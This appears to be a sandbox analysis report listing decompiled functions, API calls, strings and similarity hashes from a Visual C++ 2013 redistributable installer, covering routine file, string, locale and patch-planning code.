API ID: Time$File$CloseDateHandleLocal
String ID: Invalid operation for this state.$cabextract.cpp
API String ID: 609741386-1751360545
Opcode ID: 61ebee47100f4bce0fc08b142f8dbb50c85b2a5cc8ad14e4fbe12360dba4cde0
Instruction ID: a643bad557ddfdc6ae251b7fe73951116436906356f84f7c88c0aec087613db6
Opcode Fuzzy Hash: 61ebee47100f4bce0fc08b142f8dbb50c85b2a5cc8ad14e4fbe12360dba4cde0
Instruction Fuzzy Hash: DC11933152060BBFA7209AA8DC898BBB7BCFB05760790052EE711D7090DBB4E94687A0

Uniqueness

Uniqueness Score: -1.00%

Function 0128741B Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0128741B(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4) {
				WCHAR* _v8;
				WCHAR* _v12;
				signed char _t18;
				signed int _t25;
				void* _t33;
				intOrPtr* _t34;
				signed int _t36;

				_t34 = __edi;
				_t33 = __edx;
				_v8 = 0;
				_v12 = 0;
				_t36 = E01288C14(_a4,  *((intOrPtr*)(__edi + 0x14)),  &_v8, 0);
				if(_t36 >= 0) {
					_t18 = GetFileAttributesW(_v8);
					if(_t18 != 0xffffffff) {
						if((_t18 & 0x00000010) != 0) {
							_v12 = 1;
						}
					} else {
						_t25 = GetLastError();
						if(_t25 > 0) {
							_t25 = _t25 & 0x0000ffff | 0x80070000;
						}
						_t36 = _t25;
						if(_t36 == 0x80070002 || _t36 == 0x80070003) {
							_t36 = 0;
						}
					}
					if(_t36 >= 0) {
						asm("cdq");
						_t36 = E0128A6F5(_a4,  *((intOrPtr*)(_t34 + 4)), _v12, _t33, 0);
						if(_t36 >= 0) {
							goto L15;
						}
						_push("Failed to set variable.");
						goto L14;
					} else {
						_push(_v8);
						E012AFA86(_t36, "Failed while searching directory search: %ls, for path: %ls",  *_t34);
						goto L15;
					}
				} else {
					_push("Failed to format variable string.");
					L14:
					_push(_t36);
					E012AFA86();
					L15:
					if(_v8 != 0) {
						E012B01E8(_v8);
					}
					return _t36;
				}
			}

0x0128741b
0x0128741b
0x0128742c
0x01287432
0x0128743a
0x0128743e
0x0128744a
0x01287453
0x01287481
0x01287483
0x01287483
0x01287455
0x01287455
0x0128745d
0x01287464
0x01287464
0x01287469
0x01287471
0x0128747b
0x0128747b
0x01287471
0x0128748c
0x012874a7
0x012874b5
0x012874b9
0x00000000
0x00000000
0x012874bb
0x00000000
0x0128748e
0x0128748e
0x01287499
0x00000000
0x0128749e
0x01287440
0x01287440
0x012874c0
0x012874c0
0x012874c1
0x012874c8
0x012874cb
0x012874d0
0x012874d0
0x012874da
0x012874da

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 01287435
GetFileAttributesW.KERNEL32(?,?,?,?,00000000,?,?,00000000,00000000,?,01288B89,?,?,?,?,?), ref: 0128744A
GetLastError.KERNEL32(?,01288B89,?,?,?,?,?,?,?,?,00000001,00000000), ref: 01287455

Strings

Failed to set variable., xrefs: 012874BB
Failed while searching directory search: %ls, for path: %ls, xrefs: 01287493
Failed to format variable string., xrefs: 01287440

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: AttributesErrorFileLastOpen@16
String ID: Failed to format variable string.$Failed to set variable.$Failed while searching directory search: %ls, for path: %ls
API String ID: 1811509786-402580132
Opcode ID: 307b7b56db8e8882a89b654132659b9569e1a134d3571e7a5282dd9d27f86dae
Instruction ID: e416be9b76c947a5a0a089b5d6002ca8d7b8899f4fe7e07a9b009c98edededea
Opcode Fuzzy Hash: 307b7b56db8e8882a89b654132659b9569e1a134d3571e7a5282dd9d27f86dae
Instruction Fuzzy Hash: 4811E47283211ABEEB127EACCCC19FDBE79EB10354F304129FA41A2190E3B55E5097A1

Uniqueness

Uniqueness Score: -1.00%

Function 012B08BB Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 120
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 47%

			E012B08BB(void* __ecx, short** _a4, char* _a8, int _a12, int _a16) {
				int _v8;
				signed int _v12;
				int _t31;
				int _t33;
				int _t34;
				signed int _t38;
				short* _t41;
				short* _t43;
				int _t49;
				unsigned int _t51;
				signed int _t58;
				short** _t62;

				_t62 = _a4;
				_t30 =  *_t62;
				_t49 = 0;
				_t58 = _a12;
				_v8 = 0;
				_v12 = _t58;
				if( *_t62 == 0) {
					L4:
					if(_t58 != 0) {
						_t31 = _a12;
						if(_a8[_t31] == 0) {
							goto L12;
						}
						goto L13;
					} else {
						_t31 = MultiByteToWideChar(_a16, 0, _a8, 0xffffffff, 0, 0);
						if(_t31 != 0) {
							L12:
							_v12 = _t31 - 1;
							L13:
							_t33 = _v12 + 1;
							if(_t49 >= _t33) {
								L22:
								_t34 = _a12;
								if(_t34 == 0) {
									_t34 = _t34 | 0xffffffff;
								}
								if(MultiByteToWideChar(_a16, 0, _a8, _t34,  *_t62, _t49) != 0) {
									( *_t62)[_v12] = 0;
								} else {
									_t38 = GetLastError();
									if(_t38 > 0) {
										_t38 = _t38 & 0x0000ffff | 0x80070000;
									}
									_v8 = _t38;
									if(_t38 >= 0) {
										_v8 = 0x80004005;
									}
									_push(_v8);
									_push(0x1d2);
									goto L30;
								}
							} else {
								_t49 = _t33;
								if(_t49 < 0x7fffffff) {
									_t41 =  *_t62;
									_push(1);
									if(_t41 == 0) {
										_push(_t49 + _t49);
										_t43 = E012B233B();
									} else {
										_push(_t49 + _t49);
										_push(_t41);
										_t43 = E012B235D();
									}
									if(_t43 != 0) {
										 *_t62 = _t43;
										goto L22;
									} else {
										_t38 = 0x8007000e;
										_push(0x8007000e);
										_v8 = 0x8007000e;
										_push(0x1cb);
										goto L30;
									}
								} else {
									_v8 = 0x8007000e;
								}
							}
						} else {
							_t38 = GetLastError();
							if(_t38 > 0) {
								_t38 = _t38 & 0x0000ffff | 0x80070000;
							}
							_v8 = _t38;
							if(_t38 >= 0) {
								_v8 = 0x80004005;
							}
							_push(_v8);
							_push(0x1af);
							L30:
							_push("strutil.cpp");
							E012B294E(_t38);
						}
					}
				} else {
					_t51 = E012B2382(_t30);
					if(_t51 != 0xffffffff) {
						_t49 = _t51 >> 1;
						goto L4;
					} else {
						_v8 = 0x80070057;
					}
				}
				return _v8;
			}

0x012b08c2
0x012b08c5
0x012b08c7
0x012b08ca
0x012b08cd
0x012b08d0
0x012b08d5
0x012b08f2
0x012b08fa
0x012b093e
0x012b0948
0x00000000
0x00000000
0x00000000
0x012b08fc
0x012b0909
0x012b090d
0x012b094a
0x012b094b
0x012b094e
0x012b0951
0x012b0954
0x012b099f
0x012b099f
0x012b09a4
0x012b09a6
0x012b09a6
0x012b09b9
0x012b09f8
0x012b09bb
0x012b09bb
0x012b09c3
0x012b09ca
0x012b09ca
0x012b09cf
0x012b09d4
0x012b09d6
0x012b09d6
0x012b09dd
0x012b09e0
0x00000000
0x012b09e0
0x012b0956
0x012b0956
0x012b095e
0x012b096c
0x012b096e
0x012b0972
0x012b0983
0x012b0984
0x012b0974
0x012b0977
0x012b0978
0x012b0979
0x012b0979
0x012b098b
0x012b099d
0x00000000
0x012b098d
0x012b098d
0x012b0992
0x012b0993
0x012b0996
0x00000000
0x012b0996
0x012b0960
0x012b0960
0x012b0960
0x012b095e
0x012b090f
0x012b090f
0x012b0917
0x012b091e
0x012b091e
0x012b0923
0x012b0928
0x012b092a
0x012b092a
0x012b0931
0x012b0934
0x012b09e5
0x012b09e5
0x012b09ea
0x012b09ea
0x012b090d
0x012b08d7
0x012b08dd
0x012b08e2
0x012b08f0
0x00000000
0x012b08e4
0x012b08e4
0x012b08e4
0x012b08e2
0x012b0a03

APIs

MultiByteToWideChar.KERNEL32(?,00000000,00000340,000000FF,00000000,00000000,?,00000000,?,?,?,?,012AF6D3,?,00000340,00000000), ref: 012B0909
GetLastError.KERNEL32(?,?,?,012AF6D3,?,00000340,00000000,00000000,?,00000000,?,?,?,012AFA98,?,00000340), ref: 012B090F

Part of subcall function 012B2382: GetProcessHeap.KERNEL32(00000000,?,?,012B08DD,?,?,00000000,?,?,?,?,012AF6D3,?,00000340,00000000,00000000), ref: 012B238A
Part of subcall function 012B2382: HeapSize.KERNEL32(00000000,?,012B08DD,?,?,00000000,?,?,?,?,012AF6D3,?,00000340,00000000,00000000,?), ref: 012B2391

Strings

W, xrefs: 012B08E4
strutil.cpp, xrefs: 012B09E5

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: Heap$ByteCharErrorLastMultiProcessSizeWide
String ID: W$strutil.cpp
API String ID: 3662877508-3697633219
Opcode ID: 3d34285fcc120c1f23170be247f5536f71c25740a292237804488168b5bb4f8a
Instruction ID: 97aaaad04dee55d6082e936ef75b88d683fbb0532be9aadf7c0cc55e624ea0d8
Opcode Fuzzy Hash: 3d34285fcc120c1f23170be247f5536f71c25740a292237804488168b5bb4f8a
Instruction Fuzzy Hash: 3941747162060AEFEB128FA8CDC1AAE76B8EF04790F204629F951D7290D675DA008B58

Uniqueness

Uniqueness Score: -1.00%

Function 012AC5B1 Relevance: 9.0, APIs: 6, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 80%

			E012AC5B1(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				void* _t29;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x12d2030);
				E012A9B40(__ebx, __edi, __esi);
				_t31 = E012A9852(__ebx, _t35);
				_t15 =  *0x12d4e40; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E012AB7AB(_t25, _t31, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x12d4ac8; // 0x2d42bf8
					if(__eflags != 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							__eflags = InterlockedDecrement(_t33);
							if(__eflags == 0) {
								__eflags = _t33 - 0x12d46a0;
								if(__eflags != 0) {
									E012AB248(_t33);
								}
							}
						}
						_t21 =  *0x12d4ac8; // 0x2d42bf8
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x12d4ac8; // 0x2d42bf8
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E012AC64C();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				_t38 = _t33;
				if(_t33 == 0) {
					_push(0x20);
					E012A8D1D(_t29, _t38);
				}
				return E012A9B85(_t33);
			}

0x012ac5b1
0x012ac5b1
0x012ac5b1
0x012ac5b1
0x012ac5b3
0x012ac5b8
0x012ac5c2
0x012ac5c4
0x012ac5cc
0x012ac5ed
0x012ac5f3
0x012ac5f7
0x012ac5fa
0x012ac5fd
0x012ac603
0x012ac605
0x012ac607
0x012ac610
0x012ac612
0x012ac614
0x012ac61a
0x012ac61d
0x012ac622
0x012ac61a
0x012ac612
0x012ac623
0x012ac628
0x012ac62b
0x012ac631
0x012ac635
0x012ac635
0x012ac63b
0x012ac642
0x012ac5d4
0x012ac5d4
0x012ac5d4
0x012ac5d7
0x012ac5d9
0x012ac5db
0x012ac5dd
0x012ac5e2
0x012ac5ea

APIs

__getptd.LIBCMT ref: 012AC5BD

Part of subcall function 012A9852: __getptd_noexit.LIBCMT ref: 012A9855
Part of subcall function 012A9852: __amsg_exit.LIBCMT ref: 012A9862

__amsg_exit.LIBCMT ref: 012AC5DD
__lock.LIBCMT ref: 012AC5ED
InterlockedDecrement.KERNEL32(?), ref: 012AC60A
_free.LIBCMT ref: 012AC61D
InterlockedIncrement.KERNEL32(02D42BF8), ref: 012AC635

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: 3a7098bca4536d00de6ecf11051b884d7ffedc890cb424d9355346eec56b27fc
Instruction ID: 4ad964e952e96d54127121815c8769e1e7c3281b34f150760efc8e99dd28a285
Opcode Fuzzy Hash: 3a7098bca4536d00de6ecf11051b884d7ffedc890cb424d9355346eec56b27fc
Instruction Fuzzy Hash: 5E01C072D21613AFDB22EF29F44876DBB60BF44B21F850119EA54A7684CB30A691CFC5

Uniqueness

Uniqueness Score: -1.00%

Function 0129D623 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 211
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E0129D623(intOrPtr* __eax, void* __ecx, intOrPtr _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, signed int _a28) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				intOrPtr _t120;
				void* _t122;
				intOrPtr _t125;
				int _t133;
				signed int _t135;
				int _t138;
				int _t140;
				int _t143;
				intOrPtr* _t145;
				intOrPtr _t147;
				intOrPtr* _t149;
				int _t155;
				void* _t163;
				signed int _t182;
				signed int _t190;
				intOrPtr _t192;
				signed int _t194;
				intOrPtr* _t197;
				intOrPtr* _t198;
				intOrPtr _t199;

				_t163 = __ecx;
				_t168 = 0;
				_t198 = __eax;
				if(_a8 == 0) {
					_t3 = _t163 + 0x5c; // 0x8b012ba2
					_t192 =  *_t3;
				} else {
					_t2 = _t163 + 0x64; // 0x550008c2
					_t192 =  *_t2;
				}
				if(_a8 == _t168) {
					_t6 = _t163 + 0x60; // 0xc95b5fc7
					_t120 =  *_t6;
				} else {
					_t5 = _t163 + 0x68; // 0xec83ec8b
					_t120 =  *_t5;
				}
				_v16 = _t120;
				_v8 = _t168;
				_v12 = _t168;
				if(_t120 <= _t168) {
					L15:
					_push( &_v8);
					_push(_t163);
					_t211 = _a8 - _t168;
					if(_a8 == _t168) {
						_t122 = E01293476(_t168, __eflags);
						 *((intOrPtr*)(_t163 + 0x30)) =  *((intOrPtr*)(_t163 + 0x30)) + 1;
						_t28 = _t163 + 0x34;
						 *_t28 =  *(_t163 + 0x34) + 1;
						__eflags =  *_t28;
					} else {
						_t122 = E012934BF(_t168, _t211);
					}
					if(_t122 >= 0) {
						 *_v8 = 6;
						 *((intOrPtr*)(_v8 + 0x24)) = _a20;
						_t125 = _a24;
						 *((intOrPtr*)(_v8 + 8)) = _t125;
						__eflags =  *_t198 - 4;
						 *(_v8 + 0x18) = 0 |  *_t198 == 0x00000004;
						_t42 = _v8 + 0x24; // 0xe80574f8
						_t44 = _t125 + 0x98; // 0xe90002e2
						 *((intOrPtr*)(_v8 + 0x20)) = E0129ADFE( *_t44, _a4,  *_t42);
						 *((intOrPtr*)(_v8 + 0x10)) =  *((intOrPtr*)(_t198 + 0x58));
						 *((intOrPtr*)(_v8 + 0x14)) =  *((intOrPtr*)(_t198 + 0x5c));
						_t53 = _t198 + 8; // 0x8
						_t194 = E012B1171(_v8, _v8, _v8 + 0xc, _t53, 0);
						__eflags = _t194;
						if(_t194 >= 0) {
							_t133 = _v8;
							__eflags =  *(_t133 + 0x18);
							if( *(_t133 + 0x18) != 0) {
								 *((intOrPtr*)(_t163 + 0xc)) = 1;
							}
							_t58 = _t133 + 0x1c; // 0x1281733
							_t62 = _t133 + 0xc; // 0x2e35ee8
							E01291646(_t58, _a24,  *_t62, _a8, _a12, _a16, _t58);
							_t135 = _v8;
							goto L30;
						} else {
							_push("Failed to copy target product code.");
							goto L32;
						}
					} else {
						_push("Failed to plan action for target product.");
						goto L32;
					}
				} else {
					_t197 = _t192 + 0x18;
					do {
						_t10 = _t197 - 0x18; // 0x8b012b72
						_t149 = _t10;
						_v8 = _t149;
						if( *_t149 != 6 ||  *((intOrPtr*)(_t197 + 0xc)) != _a20 ||  *_t197 != (0 |  *_t198 == 0x00000004)) {
							goto L12;
						} else {
							_t16 = _t198 + 8; // 0x8
							_t155 = CompareStringW(_t168, _t168,  *(_t197 - 0xc), 0xffffffff, _t16, 0xffffffff);
							_t168 = 0;
							if(_t155 == 2) {
								_t135 = _v8;
								__eflags = _t135;
								if(__eflags != 0) {
									__eflags = _a8;
									if(__eflags != 0) {
										L30:
										_t77 = _t135 + 0x2c; // 0x74fc5d39
										_t194 = E012B23C6( *_t77 + 1, __eflags, _t135 + 0x28,  *_t77 + 1, 8, 2);
										_a8 = _t194;
										__eflags = _t194;
										if(_t194 >= 0) {
											_t138 = _v8;
											_t80 = _t138 + 0x2c; // 0x74fc5d39
											_t81 = _t138 + 0x28; // 0xd143
											 *((intOrPtr*)( *_t81 +  *_t80 * 8)) =  *((intOrPtr*)(_t198 + 4));
											_t140 = _v8;
											_t86 = _t140 + 0x2c; // 0x74fc5d39
											_t87 = _t140 + 0x28; // 0xd143
											 *((intOrPtr*)( *_t87 + 4 +  *_t86 * 8)) = _a24;
											 *((intOrPtr*)(_v8 + 0x2c)) =  *((intOrPtr*)(_v8 + 0x2c)) + 1;
											_t143 = _v8;
											_t96 = _t143 + 0x2c; // 0x74fc5d39
											_t190 =  *_t96 - 1;
											__eflags = _t190;
											if(_t190 != 0) {
												while(1) {
													_t98 = _t143 + 0x28; // 0xd143
													_t199 =  *_t98;
													_t182 = _t190;
													__eflags =  *((intOrPtr*)(_t199 + _t182 * 8)) -  *((intOrPtr*)(_t199 + _t182 * 8 - 8));
													if( *((intOrPtr*)(_t199 + _t182 * 8)) >=  *((intOrPtr*)(_t199 + _t182 * 8 - 8))) {
														goto L38;
													}
													_t190 = _t190 - 1;
													__eflags = _t190;
													_t145 = _t199 + _t182 * 8;
													_t106 = _t145 - 4; // 0xd9cae8f8
													_t107 = _t145 - 8; // 0x8b006a00
													 *((intOrPtr*)(_t145 - 8)) =  *_t145;
													_t109 = _t145 + 4; // 0xf0680d79
													 *((intOrPtr*)(_t145 - 4)) =  *_t109;
													_t112 = _v8 + 0x28; // 0xd143
													_t147 =  *_t112;
													 *((intOrPtr*)(_t147 + _t182 * 8)) =  *_t107;
													 *((intOrPtr*)(_t147 + 4 + _t182 * 8)) =  *_t106;
													_t194 = _a8;
													if(_t190 != 0) {
														_t143 = _v8;
														continue;
													}
													goto L38;
												}
											}
										} else {
											_push("Failed grow array of ordered patches.");
											goto L32;
										}
									} else {
										__eflags = _a28;
										if(__eflags == 0) {
											goto L30;
										} else {
											_a8 = 0;
											_t194 = E012933DA(0, __eflags, _v12, _t163,  &_a8);
											__eflags = _t194;
											if(_t194 >= 0) {
												 *_a8 = 2;
												 *(_a8 + 8) = _a28;
												_t75 = _t163 + 0x5c; // 0x8b012ba2
												_t135 = (_v12 + 1) * 0x30 +  *_t75;
												__eflags = _t135;
												_v8 = _t135;
												goto L30;
											} else {
												_push("Failed to insert execute action.");
												L32:
												_push(_t194);
												E012AFA86();
											}
										}
									}
								} else {
									goto L15;
								}
							} else {
								goto L12;
							}
						}
						goto L38;
						L12:
						_v12 = _v12 + 1;
						_t197 = _t197 + 0x30;
						_v8 = _t168;
					} while (_v12 < _v16);
					goto L15;
				}
				L38:
				return _t194;
			}

0x0129d62a
0x0129d62d
0x0129d630
0x0129d635
0x0129d63c
0x0129d63c
0x0129d637
0x0129d637
0x0129d637
0x0129d637
0x0129d642
0x0129d649
0x0129d649
0x0129d644
0x0129d644
0x0129d644
0x0129d644
0x0129d64c
0x0129d64f
0x0129d652
0x0129d657
0x0129d6b3
0x0129d6b6
0x0129d6b7
0x0129d6b8
0x0129d6bb
0x0129d6c4
0x0129d6c9
0x0129d6cc
0x0129d6cc
0x0129d6cc
0x0129d6bd
0x0129d6bd
0x0129d6bd
0x0129d6d3
0x0129d6e5
0x0129d6ee
0x0129d6f4
0x0129d6f7
0x0129d6ff
0x0129d705
0x0129d70b
0x0129d711
0x0129d71f
0x0129d728
0x0129d731
0x0129d736
0x0129d746
0x0129d748
0x0129d74a
0x0129d756
0x0129d759
0x0129d75d
0x0129d75f
0x0129d75f
0x0129d766
0x0129d773
0x0129d779
0x0129d77e
0x00000000
0x0129d74c
0x0129d74c
0x00000000
0x0129d74c
0x0129d6d5
0x0129d6d5
0x00000000
0x0129d6d5
0x0129d659
0x0129d659
0x0129d65c
0x0129d65c
0x0129d65c
0x0129d65f
0x0129d665
0x00000000
0x0129d67b
0x0129d67d
0x0129d688
0x0129d68e
0x0129d693
0x0129d6a8
0x0129d6ab
0x0129d6ad
0x0129d783
0x0129d786
0x0129d7c9
0x0129d7c9
0x0129d7db
0x0129d7dd
0x0129d7e0
0x0129d7e2
0x0129d7f3
0x0129d7f6
0x0129d7f9
0x0129d7ff
0x0129d802
0x0129d805
0x0129d808
0x0129d80e
0x0129d815
0x0129d818
0x0129d81b
0x0129d81e
0x0129d81e
0x0129d81f
0x0129d826
0x0129d826
0x0129d826
0x0129d829
0x0129d82e
0x0129d832
0x00000000
0x00000000
0x0129d834
0x0129d834
0x0129d835
0x0129d83a
0x0129d83d
0x0129d840
0x0129d843
0x0129d846
0x0129d84c
0x0129d84c
0x0129d84f
0x0129d852
0x0129d856
0x0129d859
0x0129d823
0x00000000
0x0129d823
0x00000000
0x0129d859
0x0129d826
0x0129d7e4
0x0129d7e4
0x00000000
0x0129d7e4
0x0129d788
0x0129d788
0x0129d78b
0x00000000
0x0129d78d
0x0129d795
0x0129d79d
0x0129d79f
0x0129d7a1
0x0129d7b0
0x0129d7b9
0x0129d7c3
0x0129d7c3
0x0129d7c3
0x0129d7c6
0x00000000
0x0129d7a3
0x0129d7a3
0x0129d7e9
0x0129d7e9
0x0129d7ea
0x0129d7f0
0x0129d7a1
0x0129d78b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0129d693
0x00000000
0x0129d695
0x0129d695
0x0129d69b
0x0129d69e
0x0129d6a1
0x00000000
0x0129d6a6
0x0129d85b
0x0129d861

APIs

CompareStringW.KERNEL32(00000000,00000000,?,000000FF,00000008,000000FF,00000000,00000000,00000000), ref: 0129D688

Strings

Failed grow array of ordered patches., xrefs: 0129D7E4
Failed to insert execute action., xrefs: 0129D7A3
Failed to copy target product code., xrefs: 0129D74C
Failed to plan action for target product., xrefs: 0129D6D5

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CompareString
String ID: Failed grow array of ordered patches.$Failed to copy target product code.$Failed to insert execute action.$Failed to plan action for target product.
API String ID: 1825529933-3432308488
Opcode ID: feffcfc482959824ee23c7b19d201b08cd4a6cdae305e5393175844e5b53a36e
Instruction ID: 79bf8f6274efae83cab71d7e0344c43f8e0c918c4a4d0b088ab7a0d3eb64dfaa
Opcode Fuzzy Hash: feffcfc482959824ee23c7b19d201b08cd4a6cdae305e5393175844e5b53a36e
Instruction Fuzzy Hash: C281F679A20209EFCF09CF98C5819ADB7B5FF48310B21819AE9099B362D730EE41DF50

Uniqueness

Uniqueness Score: -1.00%

Function 012A3CEF Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E012A3CEF(intOrPtr _a4, intOrPtr* _a8, int _a12) {
				int _v8;
				int _v12;
				int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				short* _t51;
				intOrPtr* _t54;
				intOrPtr* _t59;
				intOrPtr _t61;
				intOrPtr _t68;
				intOrPtr _t81;
				int _t82;
				intOrPtr* _t85;
				void* _t99;

				_t82 = _a12;
				_t51 =  *(_t82 + 0xbc);
				_v8 = 0;
				_v16 = 0;
				if(_t51 != 0) {
					if(CompareStringW(0, 1, _t51, 0xffffffff,  *(_t82 + 0x10), 0xffffffff) != 2) {
						_t54 =  *((intOrPtr*)(_t82 + 0x40));
						if(_t54 != 0 &&  *_t54 != 0) {
							_t81 =  *_a8;
							if(_t81 == 5) {
								L9:
								_v16 = 1;
							} else {
								if(_t81 == 4 || _t81 == 6 || _t81 == 7) {
									if(E0129EEAA(_t81, _t82, _t54) != 0) {
										goto L9;
									}
								}
							}
						}
						_v12 = 0;
						if( *((intOrPtr*)(_t82 + 0xb8)) > 0) {
							_a12 = 0;
							do {
								_t85 =  *((intOrPtr*)(_t82 + 0xb4)) + _a12;
								if( *_t85 != 2) {
									goto L17;
								} else {
									_t99 =  *((intOrPtr*)(_t82 + 0x3c)) -  *((intOrPtr*)(_t85 + 0xc));
									if(_t99 > 0 || _t99 >= 0 &&  *((intOrPtr*)(_t82 + 0x38)) >  *((intOrPtr*)(_t85 + 8)) || CompareStringW(0, 1,  *(_t82 + 0xbc), 0xffffffff,  *(_t85 + 0x18), 0xffffffff) != 2) {
										goto L17;
									} else {
										_t59 =  *((intOrPtr*)(_a4 + 0x10));
										_t77 =  *_t59;
										_t76 = _t85 + 0x18;
										_a12 =  *((intOrPtr*)( *_t59 + 0x1c))(_t59,  *(_t85 + 0x18),  *_t85,  *((intOrPtr*)(_t85 + 0x10)),  *((intOrPtr*)(_t85 + 0x2c)),  *((intOrPtr*)(_t85 + 8)),  *((intOrPtr*)(_t85 + 0xc)), _v16);
										_t61 = E0128BC36(_a4, 1, _t60);
										_v8 = _t61;
										__eflags = _t61;
										if(_t61 >= 0) {
											__eflags = _a12 - 1;
											if(__eflags != 0) {
												L26:
												_push(E01291879( *(_t82 + 0xc4)));
												_push(E01291D07( *((intOrPtr*)(_t85 + 8)),  *((intOrPtr*)(_t85 + 0xc))));
												_push(E01291A0D( *((intOrPtr*)(_t85 + 0x2c))));
												_push(E01291A96( *_t85));
												E01281566(2, 0x2000006b,  *_t76);
											} else {
												_t68 = E012A4415(_t76, _t77, _t82, _t85, __eflags, _t82 + 0xc8, _a8, 0,  *((intOrPtr*)(_t82 + 0x40)),  *((intOrPtr*)(_t82 + 0xc0)), _t76);
												_v8 = _t68;
												__eflags = _t68;
												if(_t68 >= 0) {
													 *(_t82 + 0xc4) = 1;
													goto L26;
												} else {
													_push("Failed to initialize update bundle.");
													_push(_t68);
													goto L24;
												}
											}
										} else {
											E012B294E(_t61, "detect.cpp", 0x6e, _t61);
											_push("BA aborted detect forward compatible bundle.");
											_push(_v8);
											L24:
											E012AFA86();
										}
									}
								}
								goto L27;
								L17:
								_v12 = _v12 + 1;
								_a12 = _a12 + 0xf8;
							} while (_v12 <  *((intOrPtr*)(_t82 + 0xb8)));
						}
					}
					L27:
				}
				return _v8;
			}

0x012a3cf7
0x012a3cfa
0x012a3d02
0x012a3d05
0x012a3d0a
0x012a3d27
0x012a3d2d
0x012a3d32
0x012a3d3c
0x012a3d41
0x012a3d5d
0x012a3d5d
0x012a3d43
0x012a3d46
0x012a3d5b
0x00000000
0x00000000
0x012a3d5b
0x012a3d46
0x012a3d41
0x012a3d64
0x012a3d6d
0x012a3d73
0x012a3d76
0x012a3d7c
0x012a3d82
0x00000000
0x012a3d84
0x012a3d87
0x012a3d8a
0x00000000
0x012a3dc8
0x012a3dd1
0x012a3dd7
0x012a3ddc
0x012a3df0
0x012a3df3
0x012a3df8
0x012a3dfb
0x012a3dfd
0x012a3e16
0x012a3e1a
0x012a3e57
0x012a3e62
0x012a3e6e
0x012a3e77
0x012a3e7f
0x012a3e89
0x012a3e1c
0x012a3e32
0x012a3e37
0x012a3e3a
0x012a3e3c
0x012a3e4d
0x00000000
0x012a3e3e
0x012a3e3e
0x012a3e43
0x00000000
0x012a3e43
0x012a3e3c
0x012a3dff
0x012a3e07
0x012a3e0c
